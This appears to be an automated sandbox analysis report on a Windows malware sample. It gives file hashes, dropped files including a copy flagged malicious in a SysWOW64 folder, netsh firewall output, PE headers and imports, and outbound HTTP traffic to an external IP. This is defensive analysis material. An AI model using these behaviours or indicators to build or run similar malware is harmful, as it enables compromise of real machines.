                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):7250
                                                                                                                                                                                                        Entropy (8bit):3.1662738963358006
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:cEj+AbCEH+AbuEAc+AbhGEA+AbNEe+Ab/Ee+AbPE6w9+Ab1wTEE+Abd:cY+38+DJc+iGr+MZ+65+6tg+ECf+U
                                                                                                                                                                                                        MD5:D84538A0E9147E5B95BC1467B1B2896E
                                                                                                                                                                                                        SHA1:1FEDFAF48A265C0DE88815A8EA821B48F70CA1BA
                                                                                                                                                                                                        SHA-256:385EBB80F9EEBAD4B6B05FD2518ABBFC508981C992566B8844A9937BFD2EE9B0
                                                                                                                                                                                                        SHA-512:325545DCE9302944A12C8715BCFD5E23085E522D91133471EB4C818998725EC65ECF44EC033F3B237EBA0A1AF64048F5011DC4A97B3F014CDB246C9FDA859402
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: ..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
                                                                                                                                                                                                        C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20220105_033224_675.etl
                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                                        Entropy (8bit):3.312992075887116
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:PCFdQ2o+HK5Lu9D2YPmCKTvI2l5SkGP4nlT2FbYFzGUMCl6JRW:Kf5Cml2CJxnC+w
                                                                                                                                                                                                        MD5:699F867B2888AADC69EA64322AFA75D9
                                                                                                                                                                                                        SHA1:1B6A8DFECF131411C6F6E4A2951A1C9ED8AA324B
                                                                                                                                                                                                        SHA-256:2DB7A93AD5A6FDD71E29DC63581BA513221F106F577A530AA84C4599795579A8
                                                                                                                                                                                                        SHA-512:AB460B75F2E7ED82E48301554696B523BEB69E7193686FF30911C62A38031F2736BAAE8AF021E80EF687CB4B4F09BF0C18426EE1BB843C0BA9ADE575DF400C18
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: .... ... ....................................... ...!...........................l...@...M........................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................./_8..... ......h..............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.2.0.1.0.5._.0.3.3.2.2.4._.6.7.5...e.t.l.........P.P.l...@...M.......................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe (copy)
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14973440
                                                                                                                                                                                                        Entropy (8bit):4.645907802057032
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:+AH3plu5xWDwtTwKc6+9YwoTPxSeI2co8mfgWddddddddddddddddddddddddddt:+AH3pCxvTS6Wh6PIeI/
                                                                                                                                                                                                        MD5:F548B3529CA470C25E50AF6220AD3098
                                                                                                                                                                                                        SHA1:A241FBA1FD229664849616D3425AC80DA447583B
                                                                                                                                                                                                        SHA-256:B9029679671D745FEE6E41A455E8DAAC8D64FC9DA159416596D02736A544D4AB
                                                                                                                                                                                                        SHA-512:1E6C0914678E07D1DBCA262F57D88ED54E35E6B15AC4E5ADFE74EBB001D323BB45CEA47F1CCB9995BC65B02C00CEAE5ACE2AE3AF590829050963514351AA5CA7
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................C..........R..........................Rich............PE..L...15.`.................>...........+.......P....@.................................*(......................................<;..(.......`....................P..,#..`............................... ...@............................................text...n<.......>.................. ..`.data...H%...P.......B..............@....lave................X..............@....fidoce.K............Z..............@....pihudu..............\..............@....lafog...............^..............@....rsrc...`............l..............@..@.reloc...>...P......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                        \Device\ConDrv
                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3773
                                                                                                                                                                                                        Entropy (8bit):4.7109073551842435
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                                                                                        MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                                                                                        SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                                                                                        SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                                                                                        SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Entropy (8bit):6.634640145792183
                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                        File name:nkINykHreE.exe
                                                                                                                                                                                                        File size:343040
                                                                                                                                                                                                        MD5:dc67c627917ff9724f3c1e6db5f2dc27
                                                                                                                                                                                                        SHA1:4b7528999ad6095b3fbb3aec059efb88d999ea95
                                                                                                                                                                                                        SHA256:26a4c5b36d9fde80ea47137eb53b40dacf240432a5895f98417eae51b6b681da
                                                                                                                                                                                                        SHA512:977aab0ac60948315435e0698058598f40f42d7830b87ee7668bb209938cb388aa5b07c13b66c56db1affa6f86a859b3c01666a22e437c808b6c9db38975c7b0
                                                                                                                                                                                                        SSDEEP:6144:5lA3X2bDueST6gKO1tqT7b4YlCTFGbGQ273pQGfT:5lA3X22e0VKYY70A4FOGQKt
                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................C..........R...........................Rich............PE..L....(._.................@.........

                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                        Icon Hash:c8d0d8e0f8e8f4e8

                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Entrypoint:0x422e10
                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                        Time Stamp:0x5F83280E [Sun Oct 11 15:43:10 2020 UTC]
                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                        Import Hash:e64508a754c560e6e71788b6f0d7d44d

                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                        call 00007F6780FB087Bh
                                                                                                                                                                                                        call 00007F6780FA0EA6h
                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        int3
                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                        push FFFFFFFEh
                                                                                                                                                                                                        push 004435E0h
                                                                                                                                                                                                        push 0042C640h
                                                                                                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        add esp, FFFFFF94h
                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                        push esi
                                                                                                                                                                                                        push edi
                                                                                                                                                                                                        mov eax, dword ptr [00445748h]
                                                                                                                                                                                                        xor dword ptr [ebp-08h], eax
                                                                                                                                                                                                        xor eax, ebp
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                        mov dword ptr [ebp-18h], esp
                                                                                                                                                                                                        mov dword ptr [ebp-70h], 00000000h
                                                                                                                                                                                                        mov dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                        lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                                        push eax
                                                                                                                                                                                                        call dword ptr [00401218h]
                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                        jmp 00007F6780FA0EB8h
                                                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                                                        ret
                                                                                                                                                                                                        mov esp, dword ptr [ebp-18h]
                                                                                                                                                                                                        mov dword ptr [ebp-78h], 000000FFh
                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                        mov eax, dword ptr [ebp-78h]
                                                                                                                                                                                                        jmp 00007F6780FA0FE7h
                                                                                                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                        call 00007F6780FA1024h
                                                                                                                                                                                                        mov dword ptr [ebp-6Ch], eax
                                                                                                                                                                                                        push 00000001h
                                                                                                                                                                                                        call 00007F6780FB125Ah
                                                                                                                                                                                                        add esp, 04h
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        jne 00007F6780FA0E9Ch
                                                                                                                                                                                                        push 0000001Ch
                                                                                                                                                                                                        call 00007F6780FA0FDCh
                                                                                                                                                                                                        add esp, 04h
                                                                                                                                                                                                        call 00007F6780FAC4D4h
                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                        jne 00007F6780FA0E9Ch
                                                                                                                                                                                                        push 00000010h

                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                                                                                                        • [LNK] VS2008 build 21022
                                                                                                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                                                                                                        • [C++] VS2008 build 21022

                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x43d6c0x28.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x8d60.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x650000x2338.reloc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x13600x1c.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa7200x40.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x10000x2e8.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                        Sections

                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x10000x43e9e0x44000False0.564783432904data6.85301887621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .data0x450000x125480x1600False0.234907670455data3.04465131618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .bekuvox0x580000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .jutu0x590000x4b0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .vezev0x5a0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .mubone0x5b0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rsrc0x5c0000x8d600x8e00False0.550533670775data5.61683000137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .reloc0x650000x3e840x4000False0.444885253906data4.56707219047IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                        Resources

                                                                                                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                        CIDAFICUDUROSOTAROM0x625880x6c7ASCII text, with very long lines, with no line terminatorsSpanishColombia
                                                                                                                                                                                                        RT_CURSOR0x62d600x130dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_CURSOR0x62ea80x130dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_CURSOR0x62fd80xf0dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_CURSOR0x630c80x10a8dBase III DBT, version number 0, next free block index 40Divehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_ICON0x5c6a00x6c8dataSpanishColombia
                                                                                                                                                                                                        RT_ICON0x5cd680x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                        RT_ICON0x5d2d00x10a8dataSpanishColombia
                                                                                                                                                                                                        RT_ICON0x5e3780x988dBase III DBT, version number 0, next free block index 40SpanishColombia
                                                                                                                                                                                                        RT_ICON0x5ed000x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                        RT_ICON0x5f1b80x8a8dataSpanishColombia
                                                                                                                                                                                                        RT_ICON0x5fa600x6c8dataSpanishColombia
                                                                                                                                                                                                        RT_ICON0x601280x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                        RT_ICON0x606900x10a8dataSpanishColombia
                                                                                                                                                                                                        RT_ICON0x617380x988dataSpanishColombia
                                                                                                                                                                                                        RT_ICON0x620c00x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                        RT_STRING0x641a00x6edataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_STRING0x642100x256dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_STRING0x644680x788dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_STRING0x64bf00x16edataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_ACCELERATOR0x62ca80x78dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_ACCELERATOR0x62c500x58dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_GROUP_CURSOR0x62e900x14dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_GROUP_CURSOR0x641700x30dataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        RT_GROUP_ICON0x5f1680x4cdataSpanishColombia
                                                                                                                                                                                                        RT_GROUP_ICON0x625280x5adataSpanishColombia
                                                                                                                                                                                                        None0x62d300xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        None0x62d400xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        None0x62d200xadataDivehi; Dhivehi; MaldivianMaldives
                                                                                                                                                                                                        None0x62d500xadataDivehi; Dhivehi; MaldivianMaldives

                                                                                                                                                                                                        Imports

                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        KERNEL32.dllCallNamedPipeA, TerminateProcess, GetExitCodeProcess, GetVersionExA, GetConsoleCP, GetConsoleAliasesLengthA, CommConfigDialogA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, GetProcessPriorityBoost, SetVolumeMountPointA, GetLongPathNameA, CopyFileW, TlsSetValue, SetConsoleCursorInfo, LocalHandle, TzSpecificLocalTimeToSystemTime, FindAtomA, ReleaseSemaphore, GetNamedPipeHandleStateA, SetThreadPriorityBoost, BuildCommDCBAndTimeoutsW, GetProcAddress, GetModuleHandleA, LocalAlloc, LocalReAlloc, GetCommandLineA, InterlockedExchange, GetCalendarInfoA, DeleteFileA, CreateActCtxA, CreateRemoteThread, CreateThread, GetPriorityClass, WritePrivateProfileStringW, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoA, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryA, GetSystemWow64DirectoryW, GetLastError, GetProfileStringA, WriteProfileSectionW, GetProfileStringW, SetLastError, GetStringTypeExA, DebugBreak, GetPrivateProfileSectionW, lstrcmpW, ReadFile, GetConsoleMode, TerminateThread, GetThreadSelectorEntry, lstrcatW, CreateActCtxW, SetMailslotInfo, SetSystemTimeAdjustment, DefineDosDeviceW, EndUpdateResourceW, WriteConsoleA, GetPrivateProfileStructW, TryEnterCriticalSection, HeapLock, DisableThreadLibraryCalls, PeekConsoleInputW, GetTapeStatus, TransmitCommChar, WaitNamedPipeW, FindResourceExA, GetLocalTime, GetOverlappedResult, CreateSemaphoreW, SetThreadLocale, SetFileShortNameA, lstrcpyA, VerLanguageNameW, UnlockFile, GetConsoleAliasA, GetConsoleAliasExesLengthW, EnumDateFormatsW, RequestDeviceWakeup, ResetWriteWatch, GetNumberOfConsoleInputEvents, TlsGetValue, GetComputerNameW, HeapFree, SetCommMask, SetEndOfFile, FindClose, PostQueuedCompletionStatus, AreFileApisANSI, SetWaitableTimer, EnumResourceNamesW, GetProcessTimes, GetConsoleAliasesLengthW, FatalAppExitA, lstrcpynW, GetNamedPipeInfo, FillConsoleOutputCharacterA, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameW, WriteProfileStringW, SetHandleCount, GlobalAddAtomA, TerminateJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32FirstW, SetCurrentDirectoryW, GetBinaryTypeW, OpenMutexA, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, MultiByteToWideChar, InterlockedCompareExchange, Sleep, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwind, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleFileNameW, MoveFileA, GetStartupInfoW, LCMapStringA, LCMapStringW, GetCPInfo, HeapValidate, IsBadReadPtr, GetStringTypeW, GetModuleHandleW, TlsAlloc, GetCurrentThreadId, TlsFree, GetStdHandle, WriteFile, OutputDebugStringA, WriteConsoleW, GetFileType, OutputDebugStringW, ExitProcess, LoadLibraryW, GetModuleFileNameA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapDestroy, HeapCreate, VirtualFree, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, FlushFileBuffers, SetFilePointer, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetLocaleInfoW, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA

                                                                                                                                                                                                        Possible Origin

                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                        SpanishColombia
                                                                                                                                                                                                        Divehi; Dhivehi; MaldivianMaldives

                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.355736017 CET4975180192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.405219078 CET804975189.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.405328989 CET4975180192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.405797005 CET4975180192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.405874968 CET4975180192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.455002069 CET804975189.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.496562004 CET804975189.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.496746063 CET4975180192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.498907089 CET4975180192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.541908979 CET4975280192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.548660040 CET804975189.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.617382050 CET804975289.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.617525101 CET4975280192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.617714882 CET4975280192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.617731094 CET4975280192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.693140984 CET804975289.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.742883921 CET804975289.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.743149996 CET4975280192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.743724108 CET4975280192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:46.819061041 CET804975289.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.085897923 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.154086113 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.154202938 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.154268026 CET4975380192.168.2.589.223.65.17
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245182037 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245227098 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245280027 CET804975389.223.65.17192.168.2.5
                                                                                                                                                                                                        Jan 4, 2022 19:32:47.245313883 CET4975380192.168.2.589.223.65.17
